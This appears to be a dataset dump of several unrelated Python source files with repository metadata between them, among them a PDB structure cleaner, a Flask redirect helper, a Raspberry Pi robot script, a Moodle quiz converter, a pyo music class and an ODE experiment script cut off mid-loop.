print 'PDB ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, non-HETATM lines removed\nclean data written to ' + os.path.relpath( out_filename )
else:
print 'All ' + only + ' lines in PDB file ' + os.path.relpath( pdb_filename ) + ' written to ' + os.path.relpath( out_filename )
# optionally redo for all unique members
if not only and write_unique:
if len( unique ) > 1:
# do them all
# for resn in unique:
# clean_HETATM_lines_from_pdb( out_filename , '' , resn )
unique_filenames = [clean_HETATM_lines_from_pdb( out_filename , '' , resn ) for resn in unique]
return out_filename , unique_filenames
else:
# only 1 HETATM type...
unique = unique[0]
print 'Only 1 type of HETATM found, ' + unique
if unique in WATER_CONVERSION.keys():
unique = 'waters'
# print 'Renaming ' + root_filename + '.hetatm.pdb to ' + root_filename + '.' + unique + '.pdb'
# shutil.move( root_filename + '.hetatm.pdb' , root_filename + '.' + unique + '.pdb' )
temp = root_filename + '.' + unique + '.pdb'
print 'Renaming ' + os.path.relpath( out_filename ) + ' to ' + os.path.relpath( temp )
shutil.move( out_filename , temp )
out_filename = temp
return out_filename
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
# scan for alternate location fields
def clean_alternate_conformations_from_pdb( pdb_filename , remove_identifier = True ):
"""
Writes PDB files for each of the alternate conformations found in
<pdb_filename>
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# verify it exists
if not os.path.exists( pdb_filename ):
# for pipelines etc.
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
# find all alternate conformations
f = open( pdb_filename , 'r' )
lines = f.readlines()
f.close()
# for storage
non_alternating = ['']
alternate_conformations = []
last_line_alternate = False
index = 0
alternate_index = -1
conformation_names = []
resis = set()
for i in lines:
# skip non ATOM lines...fix this later to support header?
if not i[:6].strip() in ['ATOM' , 'HETATM']:
last_line_alternate = False
continue
# sort it
if i[16].strip():
conformation = i[16]
resis.add( i[21] +':'+ i[22:27].strip() )
# optionally remove the alternate conformation identifier
if remove_identifier:
i = i[:16] + ' ' + i[17:]
# did we just transition into an alt conf region?
if last_line_alternate:
# still in the same region
if not conformation in alternate_conformations[alternate_index].keys():
alternate_conformations[alternate_index][conformation] = i
if not conformation in conformation_names:
conformation_names.append( conformation )
else:
alternate_conformations[alternate_index][conformation] += i
else:
# in a new region
# if alternate_conformations:
# conformation_names = list( set( conformation_names + alternations_conformations[-1].keys() ) )
# number_of_conformations = max( number_of_conformations , len( alternate_conformations[-1].keys() ) )
alternate_index += 1
alternate_conformations.append( {conformation : i} )
if not conformation in conformation_names:
conformation_names.append( conformation )
last_line_alternate = True
else:
# did we just transition into an alt conf region?
if last_line_alternate:
# entered a new region
index += 1
non_alternating.append( i )
else:
# in the same region
non_alternating[index] += i
last_line_alternate = False
# exit condition
conformation_names.sort() # intuitive order...
if not conformation_names:
print 'No alternate conformations detected (17th column)'
return False
else:
print 'found ' + str( len( conformation_names ) ) + ' alternate conformations: ' + ', '.join( conformation_names )
print 'alternate locations found for residues: ' + ', '.join( list( resis ) )
# print index , alternate_index , number_of_conformations
# write out the alternate conformations
conformation_filenames = []
for i in conformation_names:
# make a text by building from fragments
text = ''
for j in xrange( len( non_alternating ) - 2 ):
text += non_alternating[j]
if i in alternate_conformations[j].keys():
text += alternate_conformations[j][i]
else:
# default to the "first" alt conf ID
key = 0
while not conformation_names[key] in alternate_conformations[j].keys():
key += 1
key = conformation_names[key]
text += alternate_conformations[j][key]
# add edge case
text += non_alternating[-1]
# write the file
out_filename = root_filename + '_conformation_' + i +'.pdb'
print 'writing conformation ' + i + ' out to ' + os.path.relpath( out_filename ) + ' ...'
f = open( out_filename , 'w' )
f.write( text )
f.close()
conformation_filenames.append( out_filename )
return conformation_filenames
################################################################################
# CONVERTERS
# rewrite the hetatm lines in the pdb file
def convert_pdb_resnames_to_ATOM_lines( hetatm_pdb_filename , out_filename = '' , report_filename = '' , conversion = three2three ):
"""
Rewrites all HETATM lines in <hetatm_pdb_filename> found as keys in
the dict <conversion> and replaces them with their values
also rewrites the "HETATM" record as "ATOM "
used to convert HETATM lines that are proxies for amino acids
"""
hetatm_pdb_filename = os.path.abspath( hetatm_pdb_filename )
# handle defaults
if not out_filename:
# override
print 'no output filename provided, overwriting ' + hetatm_pdb_filename
out_filename = hetatm_pdb_filename
# make sure it exists
if os.path.isfile( hetatm_pdb_filename ):
# load in the lines
f = open( hetatm_pdb_filename , 'r' )
d = f.readlines()
f.close()
# change to the desired format
converted = []
for line in xrange( len( d ) ):
record = d[line][:6].strip()
resname = d[line][17:20].strip()
# go ahead and just rewrite
if record in ['ATOM' , 'HETATM'] and not resname in one2three.values() and resname in conversion.keys():
new = conversion[resname]
d[line] = d[line][:17] + new.rjust(3) + d[line][20:]
# for records...
temp = resname + ' lines converted to ' + new
if not temp in converted:
converted.append( temp )
# check the record...all to ATOM
if record == 'HETATM':
d[line] = 'ATOM '+ d[line][6:]
# debug output
if converted:
converted = '\n'.join( converted )
print converted
if report_filename:
print 'summary of converted lines written to ' + report_filename
f = open( report_filename , 'w' )
f.write( converted )
f.close()
# write it back
f = open( out_filename , 'w' )
f.writelines( d )
f.close()
else:
print 'No such file named ' + os.path.relpath( hetatm_pdb_filename )
return False
# useful?
# rewrite the water lines in the pdb file to the standard...from settings?
def convert_water_containing_pdb( hetatm_pdb_filename , conversion = WATER_CONVERSION ):
"""
Rewrites all HETATM "water" lines in <hetatm_pdb_filename> to resNames
based on <conversion>
adjust the definition of water (<look_for>) and what to switch to in
settings.py
not currently used...
"""
hetatm_pdb_filename = os.path.abspath( hetatm_pdb_filename )
if os.path.isfile( hetatm_pdb_filename ):
# load in the lines
f = open( hetatm_pdb_filename , 'r' )
d = f.readlines()
f.close()
# change to the desired format
for line in xrange( len( d ) ):
resname = d[line][17:20]
if resname.strip() in WATER_CONVERSION.keys():
d[line] = d[line][:17] + WATER_CONVERSION[resname].rjust(3) + d[line][20:]
# write it back...bad!
f = open( hetatm_pdb_filename , 'w' )
f.writelines( d )
f.close()
else:
print 'No such file named ' + os.path.relpath( hetatm_pdb_filename )
return False
# removes lines from <pdb_file> and writes to <out_file> ending in new
def clean_ATOM_non_new_lines_from_pdb( pdb_filename , out_filename = '' ):
"""
Write all lines in the PDB file <pdb_filename> as long as the last three
characters on the line aren't "new"
used to clean Hydrogens added using Reduce
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# an optional argument for PDB files not ending in .pdb
# if not edit:
# edit = 255
# if the file exists
if os.path.exists( pdb_filename ):
# find all ATOM and TER lines
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
for i in data:
if (i[:5] == 'ATOM ' or i[:4] == 'TER ') and not i.strip()[-3:] == 'new' and i[17:20] in one2three.values():
good.append( i )
# stop condition
if not good:
# tell the user and exit
print 'No ATOM non-new lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
out_filename = root_filename + '.non_new.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
print 'PDB file ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, non-ATOM lines lacking \"new\" removed\nclean data written to ' + os.path.relpath( out_filename )
return out_filename
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
################################################################################
# MAIN
if __name__ == '__main__':
# parser object for managing input options
parser = optparse.OptionParser()
# essential data
parser.add_option( '-p' , dest = 'pdb_filename' ,
default = '' ,
help = 'the pdb filename to process' )
parser.add_option( '-f' , dest = 'seqformat' ,
default = SEQFORMAT ,
help = 'sequence file format, based on settings (!) and Biopython' )
# the other options for the method...are for interactive use
# hard to manipulate from the commandline...
(options,args) = parser.parse_args()
# check inputs
# no edits/modifications
# kinda silly, but I do this as "my style", easy to modify cleanly
pdb_filename = options.pdb_filename
seqformat = options.seqformat
process_pdb( pdb_filename , seqformat )
################################################################################
################################################################################
# UNFINISHED!!!
# scan for repeated chains and delete them, rewrite it
def clean_redundancy_from_pdb( in_filename , out_filename = '' ):
"""
Not currently supported
"""
print 'This is not currently supported sorry...\nIt should look for redundant copies...though it seems the best way to do this is to read directly from the header...but...even for the same sequence, the PDB file may have slightly different coordinates..so how to choose?\nUse process_pdb instead, a separate method is not supported because of this choice problem'
# rewrite a dna or rna pdb to be rosetta friendly
def convert_nucleic_acids_for_rosetta( nucleic_pdb_filename ):
"""
Not currently supported
"""
print '...still researching...for whatever reason, most DNA PDB coordinates are accepted in Rosetta (and thus do not crash PyRosetta) however, I cannot get RNA loading to work no matter what (!!??!)\nthey can be ~loaded by modifying the database, but this does not seem to actually do anything, although...make_pose_from_sequence can then make RNA polymers, generating a nonstandard ResidueSet also does not work...perhaps cause the lines are ATOM?'
"""
deprecated stuff...just in case...
# f = open( pdb_filename , 'r' )
# complexes = []
# keep_going = True
# while keep_going:
# next line
# line = f.next()
# ...think about this...
# check if chain info, extract the matching subunits
# if 'CHAIN:' in line:
# dupl = line.split( 'CHAIN: ' )[-1].replace( ';' , '' ).strip().split( ', ' ) # ignore ";\n"
# if len( dupl ) > 1:
# complexes.append( dupl )
# stop condition
# elif not ('HEADER' in line or 'TITLE' in line or 'COMPND' in line):
# keep_going = False
# f.close()
# convert complexes
# if complexes:
# if not sum( [len( c ) - len( complexes[0] ) for c in complexes] ):
# all are the same length
# complexes = [''.join( [c[i] for c in complexes] ) for i in xrange( len( complexes[0] ) )]
# else:
# uh oh...
# could be all should be unique...which puts us in exception land anyway
# assume that last listed are aberrantly unpaired
# lowest = min( [len( c ) for c in complexes] )
# temp = [''.join( [c[i] for c in complexes] ) for i in xrange( lowest )]
# for c in complexes:
# temp += c[lowest:]
# complexes = temp
# shutil.copy( seq_filename , seqid2 )
# extract_protein_sequence_from_pdb( temp , '' + seqid + '.fa' , seqid , model , chain )
# so...this Biopython object just doesn't work...
# make a new selection
# selection = Select()
# selection.accept_model( i )
# for l in c:
# selection.accept_chain( l )
# return the filename of the "best" PDB made for Rosetta
# also return PDB numbering map?
# if has_nucleic:
# pdb_filename = root_name + '/' + pdb_filename
# else:
# pdb_filename = root_name + '/' + root_name + '.clean.pdb'
# extract numbering of the best
# pdb_map , reverse_map = extract_numbering_map_from_pdb( pdb_filename , pdb_filename[:-4] + '_numbering_map.txt' )
# uh oh, bug...dont wanna fix now
# until this is proper, leave this to Rosetta...
# return pdb_filename #, pdb_map
# if not chain:
# chain = pdb.child_dict.keys()[0]
# copy the chain
# conver the model into a Structure, for getting the sequence
# for_seq = Structure( 'temp' )
# ...oh yeah...must be model 0 and up >:[
# temp_model = Model( 0 )
# for_seq.add( temp_model )
# for ch in pdb.child_dict.keys():
# copy it all over directly
# for_seq[0].add( pdb[ch] )
# extract the sequence as a Biopython Seq object
# gap regions makred as "|"
# seq_builder = PPBuilder()
# pp = seq_builder.build_peptides( for_seq )
# seq = Seq( '' , ProteinAlphabet )
# for frag in pp:
# seq += frag.get_sequence() + '|' # already a Biopython Seq
# or...just do this...
# from making sequences for subdirectories...
# temp_seq = SeqRecord( Seq( temp_seq , protein_alphabet ) )
# temp_seq.id = os.path.split( root_name )[-1] + ' chain ' + chain
# temp_seq.description = '(from model ' + str( model + 1 ) + ')'
"""
|
gpl-2.0
| 6,684,947,784,690,174,000
| 40.890396
| 461
| 0.522973
| false
| 3.198708
| false
| false
| false
|
jordifierro/abidria-api
|
experiences/entities.py
|
1
|
2739
|
class Experience:
def __init__(self, title, description, author_id,
author_username=None, id=None, picture=None, is_mine=False, is_saved=False):
self._id = id
self._title = title
self._description = description
self._picture = picture
self._author_id = author_id
self._author_username = author_username
self._is_mine = is_mine
self._is_saved = is_saved
@property
def id(self):
return self._id
@property
def title(self):
return self._title
@property
def description(self):
return self._description
@property
def picture(self):
return self._picture
@property
def author_id(self):
return self._author_id
@property
def author_username(self):
return self._author_username
@property
def is_mine(self):
return self._is_mine
@property
def is_saved(self):
return self._is_saved
def builder(self):
return Experience.Builder(self)
def __eq__(self, other):
return self.__dict__ == other.__dict__
class Builder:
def __init__(self, experience):
self._id = experience.id
self._title = experience.title
self._description = experience.description
self._picture = experience.picture
self._author_id = experience.author_id
self._author_username = experience.author_username
self._is_mine = experience.is_mine
self._is_saved = experience.is_saved
def id(self, id):
self._id = id
return self
def title(self, title):
self._title = title
return self
def description(self, description):
self._description = description
return self
def picture(self, picture):
self._picture = picture
return self
def author_id(self, author_id):
self._author_id = author_id
return self
def author_username(self, author_username):
self._author_username = author_username
return self
def is_mine(self, is_mine):
self._is_mine = is_mine
return self
def is_saved(self, is_saved):
self._is_saved = is_saved
return self
def build(self):
return Experience(id=self._id, title=self._title, description=self._description,
picture=self._picture, author_id=self._author_id,
author_username=self._author_username, is_mine=self._is_mine,
is_saved=self._is_saved)
|
mit
| -958,076,121,102,915,600
| 26.39
| 93
| 0.551661
| false
| 4.403537
| false
| false
| false
|
redCOR-Public/PiBot-A
|
robot-oa.py
|
1
|
1993
|
#!/usr/bin/python
# ========================================================
# Python script for PiBot-A: obstacle avoidance
# Version 1.0 - by Thomas Schoch - www.retas.de
# ========================================================
from __future__ import print_function #+# NUR WENN PRINT!
from pololu_drv8835_rpi import motors, MAX_SPEED
from time import sleep
import RPi.GPIO as GPIO
# Signal handler for SIGTERM
import signal, sys
def sigterm_handler(signal, frame):
motors.setSpeeds(0, 0)
sys.exit(0)
signal.signal(signal.SIGTERM, sigterm_handler)
# GPIO pins of sensors
GPIO.setmode(GPIO.BCM)
GPIO_right = 21
GPIO_middle = 26
GPIO_left = 20
# Configure sensors as input
GPIO.setup(GPIO_right, GPIO.IN)
GPIO.setup(GPIO_middle, GPIO.IN)
GPIO.setup(GPIO_left, GPIO.IN)
try:
# Start moving forward
motors.setSpeeds(MAX_SPEED, MAX_SPEED)
while True: # Main loop
# Read sensor input (positive logic)
INPUT_right = not GPIO.input(GPIO_right)
INPUT_middle = not GPIO.input(GPIO_middle)
INPUT_left = not GPIO.input(GPIO_left)
# Set motor speeds dependent on sensor input
if INPUT_left and INPUT_right:
# Obstacle immediately ahead: move a bit bwrd,
# turn left a little bit and then proceed fwrd
motors.setSpeeds(-200, -200)
sleep (1)
motors.setSpeeds(-200, 200)
sleep (0.3)
motors.setSpeeds(MAX_SPEED, MAX_SPEED)
elif INPUT_middle: # turn left
motors.setSpeeds(100, MAX_SPEED)
elif INPUT_left: # turn right
motors.setSpeeds(MAX_SPEED, 200)
elif INPUT_right: # turn left
motors.setSpeeds(200, MAX_SPEED)
else:
# No sensor input: drive forward
motors.setSpeeds(MAX_SPEED, MAX_SPEED)
# Repeat this loop every 0.1 seconds
sleep (0.1)
finally:
# Stop motors in case of <Ctrl-C> or SIGTERM:
motors.setSpeeds(0, 0)
|
mit
| 6,732,276,785,605,981,000
| 28.308824
| 58
| 0.601606
| false
| 3.39523
| false
| false
| false
|
mattvonrocketstein/smash
|
smashlib/plugins/cmd_env.py
|
1
|
1353
|
""" smashlib.plugins.env_command
"""
import os
from smashlib import get_smash
from smashlib.plugins import Plugin
from smashlib.patches.base import PatchMagic
from smashlib.completion import smash_env_complete
env_completer = lambda himself, event: smash_env_complete(event.symbol)
env_regex = r'env [A-Za-z0-9_]+$'
class PatchEnv(PatchMagic):
"""
Patches builtin "env" command to add support for wildcard queries.
Example:
smash$ env XTERM*
{ 'XTERM_LOCALE': 'en_US.UTF-8',
'XTERM_SHELL': '/bin/bash',
'XTERM_VERSION': 'XTerm(297)' }
"""
name = 'env'
def __call__(self, parameter_s=''):
split = '=' if '=' in parameter_s else ' '
bits = parameter_s.split(split)
if len(bits) == 1 and bits[0]:
varname = bits[0]
if varname[-1].endswith('*'):
return dict([[k, v] for k, v in os.environ.items()
if k.startswith(varname[:-1])])
return self.original(parameter_s)
class EnvCommand(Plugin):
verbose = True
def init(self):
self.contribute_patch(PatchEnv)
self.contribute_completer(
env_regex, env_completer)
def load_ipython_extension(ip):
""" called by %load_ext magic"""
return EnvCommand(get_ipython()).install()
|
mit
| -4,364,809,888,031,154,000
| 25.019231
| 74
| 0.589061
| false
| 3.617647
| false
| false
| false
|
teknologkoren/teknologkoren-se
|
teknologkoren_se/util.py
|
1
|
2092
|
from urllib.parse import urlparse, urljoin
from flask import g, request, session, url_for
from teknologkoren_se import app
def paginate(content, page, page_size):
"""Return a page of content.
Calculates which posts to have on a specific page based on which
page they're on and how many objects there are per page.
"""
start_index = (page-1) * page_size
end_index = start_index + page_size
pagination = content[start_index:end_index]
return pagination
def url_for_other_page(page):
"""Return url for a page number."""
args = request.view_args.copy()
args['page'] = page
return url_for(request.endpoint, **args)
def is_safe_url(target):
"""Tests if the url is a safe target for redirection.
Does so by checking that the url is still using http or https and
and that the url is still our site.
"""
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and \
test_url.netloc in app.config['ALLOWED_HOSTS']
def get_redirect_target():
"""Get where we want to redirect to.
Checks the 'next' argument in the request and if nothing there, use
the http referrer. Also checks whether the target is safe to
redirect to (no 'open redirects').
"""
for target in (request.values.get('next'), request.referrer):
if not target:
continue
if target == request.url:
continue
if is_safe_url(target):
return target
def bp_url_processors(bp):
@bp.url_defaults
def add_language_code(endpoint, values):
if not values.get('lang_code', None):
values['lang_code'] = getattr(g, 'lang_code', None) or \
session.get('lang_code')
@bp.url_value_preprocessor
def pull_lang_code(endpoint, values):
lang_code = values.pop('lang_code')
if lang_code in ('sv', 'en'):
# Valid lang_code, set the global lang_code and cookie
g.lang_code = lang_code
session['lang_code'] = g.lang_code
|
mpl-2.0
| 5,092,879,950,161,629,000
| 30.223881
| 71
| 0.630497
| false
| 3.831502
| false
| false
| false
|
SDeans0/Moodle
|
matchToCloze.py
|
1
|
7517
|
# Written by Sam Deans.
# Twitter/GitHub: @sdeans0
# Licensed under the Apache License, Version 2.0 (see below)
# This program is for turning matching type Moodle questions to Cloze type questions in
# Moodle xml format.
# Run it from the command line by importing the moduleand running the
# matchToCloze.main('filename') function.
import xml.etree.ElementTree as ET
from random import random
def main(filename):
'''This takes a Moodle xml document and writes a new one with the matching type questions
from the old one parsed as Clozes'''
root = loadXML(filename)
questions = getQuestions(root)
answers = getAnswers(root)
stems = getStems(root)
gotName = getName(root)
gotGeneralFeedback = getGeneralFeedback(root)
gotPenalty = getPenalty(root)
gotHidden = getHidden(root)
quiz = ET.Element('quiz')
for index in range(len(gotName)):
wrappedClozeText = clozeSyntactify(questions[index],answers[index], stems[index])
quiz = clozeSkeleton(quiz,gotName[index],wrappedClozeText,gotGeneralFeedback[index],gotPenalty[index],gotHidden[index])
newFileName = changeFileName(filename)
output = ET.ElementTree(quiz)
output.write(newFileName, method = 'html')
# It might be worth importing xml.minidom to make a more neatly formatted XML document
# - this does not seem to be a problem in Moodle though
def loadXML(filename):
'''Loads and xml file and returns the root of the tree'''
tree = ET.parse(filename)
root = tree.getroot()
return root
def changeFileName(filename):
'''Alters the filename inputted to reflect that the output is of Clozes derived from
matching type questions'''
newFileName = filename[:-4] + '-Match-to-Cloze.xml'
return newFileName
def getQuestions(root):
'''Returns the text of each matching subquestions in a nested list:
[[Subquestions from Q1],[Subquestions from Q2],etc]'''
questions = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
subquestions = []
for element in root[index].findall('subquestion'):
subquestions.append(element[0].text[3:-4])
questions.append(subquestions)
return questions
def getAnswers(root):
'''Returns the answers to each subquestion in a nested list:
[[Answers to subquestions from Q1],[Answers to subquestions from Q2],etc]'''
answers = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
subquestions = []
for subquestion in root[index].findall('subquestion'):
for answer in subquestion.findall('answer'):
subquestions.append(answer[0].text)
answers.append(subquestions)
return answers
def getName(root):
'''Returns a list of the titles of each matching question'''
names = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
names.append(root[index][0][0].text)
return names
def getStems(root):
'''Returns the content of the "Question Text" box which explains the theme of the
subquestions'''
stems = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
stems.append(root[index][1][0].text)
print stems
return stems
def getGeneralFeedback(root):
'''Returns the content of the "General Feedback" box which explains the solutions to
the subquestions'''
genFeedbacks = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
genFeedbacks.append(root[index][2][0].text)
return genFeedbacks
def getPenalty(root):
'''Returns a list of the penalties for multiple tries (percent of whole marks)
for each matching question'''
penalties = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
penalties.append(root[index][4].text)
return penalties
def getHidden(root):
'''Returns a list of whether each question is hidden (0 or 1)'''
hiddens = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
hiddens.append(root[index][4].text)
return hiddens
def clozeSyntactify(question, answers, stem): #Questions and answers are lists of the same length
'''Takes the list of subquestions, answers to these, and the overall stem of a matching
question and returns the text of a Cloze analog with newlines between each question'''
clozeExpressionList = []
if len(question) != len(answers):
print 'You have fucked up'
for index in range(len(answers)):
answerList = []
for item in answers:
if item == answers[index]:
continue
else:
answerList.append(item)
clozeExpression = '<p><br>' + question[index] + ' {1:MC:=%s' % (answers[index])
for item in answerList:
clozeExpression += '~%s' % (item)
clozeExpression += '}</p>\n'
clozeExpressionList.append(clozeExpression)
clozeText = stem + ' \n <br>' + ''.join(clozeExpressionList)
return clozeText
def safeHTML(clozeText):
'''Designed to add a CDATA tag to the Cloze text'''
# This needs some attention - it might be better to work this in terms of forming an
# element instance rather than adding plain text.
wrappedClozeText = '<![CDATA[' + clozeText + ']]'
return wrappedClozeText
def clozeSkeleton(quiz,gotName,wrappedClozeText,gotGeneralFeedback,gotPenalty,gotHidden):
'''clozeSkeleton takes the cloze text, the name, the general feedback, penalty and
whether the question is hidden, and creates an element which is a full cloze question
in Moodle XML format. It builds this as an sub element of the quiz entered.'''
serialNumber = int(6 * 10**6 + random() * 10*4) #At some point in the future this could
# become a bug. Just make it 10**7 or 10**8 or something to avoid the indexing being
# the same. Could replace with hash('gotName')
comment = ET.Comment(' question: %d ' % (serialNumber))
quiz.append(comment)
question = ET.SubElement(quiz, 'question', {'type':'cloze'})
name = ET.SubElement(question, 'name')
nametext = ET.SubElement(name, 'text')
nametext.text = gotName
questiontext = ET.SubElement(question, 'questiontext')
questiontexttext = ET.SubElement(questiontext, 'text')
questiontexttext.text = wrappedClozeText
generalfeedback = ET.SubElement(question, 'generalfeedback')
generalfeedbacktext = ET.SubElement(generalfeedback, 'text')
generalfeedbacktext.text = gotGeneralFeedback
penalty = ET.SubElement(question, 'penalty')
penalty.text = gotPenalty
hidden = ET.SubElement(question, 'hidden')
hidden.text = gotHidden
return quiz
# Copyright 2015 Sam Deans
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
|
apache-2.0
| -6,817,513,452,035,199,000
| 37.352041
| 127
| 0.673407
| false
| 3.792634
| false
| false
| false
|
joereynolds/Mr-Figs
|
src/game.py
|
1
|
1318
|
import pygame
import json
import src.config as config
from src.user_data import UserData
class Game(object):
def __init__(self, fps):
self.done = False
self.fps = fps
self.clock = pygame.time.Clock()
def run(self, scene):
"""Our main function call. inits pygame, starts our fps clock,
and then begins our main loop
@fps = The fps you desire for the program
@scene = The scene from environment.py that you wish to use
for processing
,rendering, and updating.
"""
pygame.init()
pygame.display.set_caption(config.game_title)
with open(UserData.FULL_PATH) as user_config:
game_data = json.load(user_config)
if game_data['settings']['music']:
pygame.mixer.pre_init(44100, -16, 2, 512)
pygame.mixer.init()
pygame.mixer.music.load('./assets/audio/music/carmack.ogg')
pygame.mixer.music.play(-1)
delta_time = 0
self.clock.tick(self.fps)
while not self.done:
scene.process_input()
scene.update(delta_time)
scene.render()
scene = scene.next
pygame.display.flip()
delta_time = self.clock.tick(self.fps) / 1000.0
pygame.quit()
|
gpl-3.0
| 129,886,711,976,486,270
| 28.288889
| 71
| 0.575873
| false
| 3.865103
| false
| false
| false
|
Ezra/qwertonic
|
music.py
|
1
|
2072
|
###music.py
###Created by Joseph Rollinson, JTRollinson@gmail.com
###Last Modified: 12/07/11
###Requires: pyo
###Turns pyo into a note class that is very easy to run.
###Also contains functions to run pyo music server.
import pyo
class note(object):
'''creates a note that can be played'''
def __init__(self,frequency=440, attack=.01, decay=.2, sustain=.5, release=.1, duration=1, mul=1):
#some of this might not need to be saved later, for space saving.
self.frequency = frequency
self.attack = attack
self.decay = decay
self.sustain = sustain
self.release = release
self.duration = duration
self.mul = mul
self.envelope = pyo.Adsr(attack = attack,
decay = decay,
sustain = sustain,
release = release,
dur = duration,
mul = mul)
self.mod = pyo.Sine(freq = 0, mul = 25)
self.wave = pyo.Sine(freq = self.frequency + self.mod, mul = self.envelope)
self.wave.out()
def play(self,modulation=0):
'''plays the note'''
self.mod.setFreq(modulation)
self.wave.setFreq(self.frequency+self.mod)
self.envelope.play()
def stop(self):
self.envelope.stop()
def setFrequency(self,frequency):
'''sets the frequency of the note'''
self.frequncy = frequency
##def getNotes():
## '''returns a list of notes from middle C to the next B'''
## return map( lambda frequency: note(frequency), freqs)
def musicServer():
'''Returns a music server'''
s = pyo.Server()
s.setVerbosity(2)
s.boot()
return s
def startServer(server):
server.start()
def stopServer(server):
server.stop()
server.shutdown()
def guiMusicServer(server):
'''displays music server's gui'''
server.gui(locals())
|
bsd-2-clause
| -5,588,362,250,769,846,000
| 31.419355
| 102
| 0.543919
| false
| 3.801835
| false
| false
| false
|
yuanagain/seniorthesis
|
src/2017-04-06.py
|
1
|
6190
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import math
import numdifftools as nd
default_lambda_1, default_lambda_2, default_lambda_3 = 0.086, 0.141, 0.773
default_start = (0.372854105052, 0.393518965248, -0.0359026080443, -0.216701666067)
x_0 = default_start
res = 0.01
dt = res
def quad_sq_distance(x, y):
"""Computes the squared distance"""
dists = [ x[i] - y[i] for i in range(len(x) )]
dists = [ dists[i]**2 for i in range(len(x) )]
return sum(dists)
def plot_quad(ws, xs, ys, zs, plot_type = 0, txt = ""):
if plot_type == 0:
print("Plotting Double Plot Quad Viz")
plt.figure(1)
plt.subplot(2, 1, 1)
plt.subplots_adjust(top=0.85)
plt.plot(xs, ws)
#plt.yscale('linear')
plt.title('xy')
plt.grid(True)
#plt.gca().set_aspect('equal')
plt.subplot(2, 1, 2)
plt.plot(ys, zs)
#plt.yscale('linear')
plt.title('wz')
plt.grid(True)
#plt.gca().set_aspect('equal')
plt.suptitle(txt, fontsize=14)
plt.show()
elif plot_type == 1:
print("Plotting Overlain Double Plot Quad Viz")
plt.figure(1)
plt.plot(xs, ws)
plt.plot(ys, zs)
#plt.yscale('linear')
plt.title('x-w, y-z')
plt.grid(True)
#plt.gca().set_aspect('equal')
plt.suptitle(txt, fontsize=14)
plt.show()
elif plot_type == 2:
print("Plotting Sphere Plot Quad Viz")
fig = plt.figure()
ax = fig.gca(projection='3d')
plt.subplots_adjust(top=0.85)
plt.suptitle(txt, fontsize=14)
qdist = quad_distance(ws, xs, ys, zs)
ws = np.divide(ws, qdist)
xs = np.divide(xs, qdist)
ys = np.divide(ys, qdist)
zs = np.divide(zs, qdist)
ax.plot(xs, ys, zs)
ax.set_xlabel("X Axis")
ax.set_ylabel("Y Axis")
ax.set_zlabel("Z Axis")
ax.set_title("Nonrigorous Solution")
plt.show()
else:
print("Invalid Plot Type")
def experiment_1(start_pt = default_start,
T = 1,
lmbda = [default_lambda_1, default_lambda_2, default_lambda_3],
res = 0.001,
expmt = "search"):
## define evaluation function
def dots(x_0, lmbda):
"""
dz1/dt = lambda_2 * z1^2 - (lambda_2 + lambda_3) * z1 * z2
dz2/dt = lambda_1 * z2^2 - (lambda_1 + lambda_3) * z1 * z2
http://www.math.kit.edu/iag3/~herrlich/seite/wws-11/media/wws-talk-valdez.pdf
"""
x_1 = x_0[0]
y_1 = x_0[1]
x_2 = x_0[2]
y_2 = x_0[3]
# print(lmbda)
lambda_1 = lmbda[0]
lambda_2 = lmbda[1]
lambda_3 = lmbda[2]
x_1_dot = lambda_2 * (x_1**2 - y_1**2) - (lambda_2 + lambda_3) * (x_1*x_2 - y_1*y_2)
y_1_dot = 2 * lambda_2 * x_1 * y_1 - (lambda_2 + lambda_3) * (x_1*y_2 + y_1*x_2)
x_2_dot = lambda_1 * (x_2**2 - y_2**2) - (lambda_1 + lambda_3) * (x_1*x_2 - y_1*y_2)
y_2_dot = 2 * lambda_1 * x_2 * y_2 - (lambda_1 +lambda_3) * (x_1*y_2 + y_1*x_2)
return [x_1_dot, y_1_dot, x_2_dot, y_2_dot]
def f(x_0, lmbda, T = 1):
"""Find f(x_0 + T)"""
### TODO: refactor, make into array, then transpose
stepCnt = math.ceil(T / dt)
# Need one more for the initial values
ws = np.empty((stepCnt + 1, ))
xs = np.empty((stepCnt + 1, ))
ys = np.empty((stepCnt + 1, ))
zs = np.empty((stepCnt + 1, ))
# Setting initial values
x_1 = x_0[0]
y_1 = x_0[1]
x_2 = x_0[2]
y_2 = x_0[3]
ws[0], xs[0], ys[0], zs[0] = x_1, y_1, x_2, y_2
# Stepping through "time".
for i in range(stepCnt):
derivs = dots([ ws[i], xs[i], ys[i], zs[i] ], lmbda )
ws[i + 1] = ws[i] + (derivs[0] * dt)
